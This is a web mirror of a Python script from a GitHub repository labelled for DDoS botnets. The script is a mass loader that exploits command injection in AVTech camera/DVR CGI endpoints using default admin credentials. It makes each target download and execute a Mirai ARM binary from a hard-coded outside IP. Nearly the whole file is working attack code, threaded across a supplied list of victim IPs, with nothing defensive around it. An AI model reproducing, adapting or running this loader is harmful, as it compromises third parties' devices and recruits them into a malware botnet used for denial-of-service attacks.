Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/AVTECH/avtech.py
5038 views
1
#   Avtech loader 

2


3
import sys, time, requests

4
from threading import Thread

5
import random

6


7
num = 1

8
host_server = "23.130.192.132"

9
ips = open(sys.argv[1], "r").readlines()

10
filename = random.randint(1, 100) # making a random num for first of file name so cant get killed ez and avoid any other probs

11
filename = str(filename) # making it a str variable so we can add it lol

12
payload = "cd%20/tmp;%20wget%20http://"+host_server+"/33bi/mirai.arm5%20-O%20"+filename+".mirai.arm5;%20chmod%20777%20"+filename+".mirai.arm5;%20./"+filename+".mirai.arm5%20avtech"

13
def avtech(num, ip, port):

14
    port = int(port)

15
    host = '%s:%d' % (ip, port)

16
    url = "http://"+host+"/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$("+payload+")&password=admin"

17
    try:

18
        headers = {

19
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",

20
            "Accept-Encoding": "gzip, deflate, sdch",

21
            "Accept-Language": "en-US,en;q=0.8",

22
            "Cache-Control": "max-age=0",

23
            "Connection": "keep-alive",

24
            "Host": ip,

25
            "Upgrade-Insecure-Requests": "1",

26
            "User-Agent": "Snickers-Avtech"

27
        }

28
        r1 = requests.get(url, headers=headers)

29
        time.sleep(1)

30
        resp = r1.text

31
        if "ok" in resp.lower():

32
            print "(%d) Sent payload[1]" % (num)

33
        else:

34
            url1 = "http://"+host+"/nobody/ez.htm?a=YWRtaW46YWRtaW4=&rnd=0.06814667194551349"

35
            url2 = "http://"+host+"/cgi-bin/supervisor/CloudSetup.cgi?exefile="+payload+";%20echo%20snickers_was_here"

36
            r2 = requests.get(url1, headers=headers)

37
            time.sleep(0.5)

38
            r3 = requests.get(url2, headers=headers)

39
            time.sleep(1)

40
            resp = r3.text

41
            if "snickers_was_here" in resp.lower():

42
                print "(%d) Sent payload[2]" % (num)

43
            else:

44
                print "(%d) Failed to send both payloads..." % (num)

45
    except:

46
        pass

47
      

48
print "[AVTech] Directing Bots Towards -> %s" % (host_server)

49
for i in ips:

50
    i = i.strip("\r\n")

51
    info = i.split(":")

52
    ip = info[0]

53
    port = info[1]

54
    proc = Thread(target=avtech, args=(num, ip, port,))

55
    proc.start()

56
    num += 1

57
    

58
print "[AVTech] Finished Loading..."

59